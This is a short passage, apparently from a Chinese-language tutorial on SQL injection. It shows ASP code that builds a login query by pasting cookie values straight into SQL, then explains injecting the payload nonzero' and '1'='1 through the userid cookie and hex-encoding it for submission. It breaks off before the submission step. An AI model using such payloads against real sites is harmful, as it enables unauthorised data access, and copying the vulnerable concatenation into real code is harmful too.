set rs=server.createobject("adodb.recordset")
sql="select * from users where userid=’"&request.cookies("userid")&"’ and password=’"&request.cookies("password")&"’"
rs.open sql,conn,1,3
以userid=nonzero注入,提交userid=nonzero’ and ’1’=’1后sql语句变为:select * from users where userid=’nonzero’ and ’1’=’1’把单引号合闭。首先还要把改为16进制为:%27% 20%61%6E%64%20%27%31%27%3D%27%31,然后提交cookies,如下: